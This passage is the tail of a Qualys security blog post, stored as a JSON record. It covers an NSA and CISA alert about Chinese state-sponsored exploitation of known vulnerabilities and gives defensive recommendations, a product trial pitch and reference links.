With trending enabled for dashboard widgets, you can keep track of the trends for these vulnerabilities in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploitation, one should do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * An organization's vigilance team should keep a close eye on indicators of compromise (IOCs) and maintain strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "modified": "2020-10-22T23:10:29", "published": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}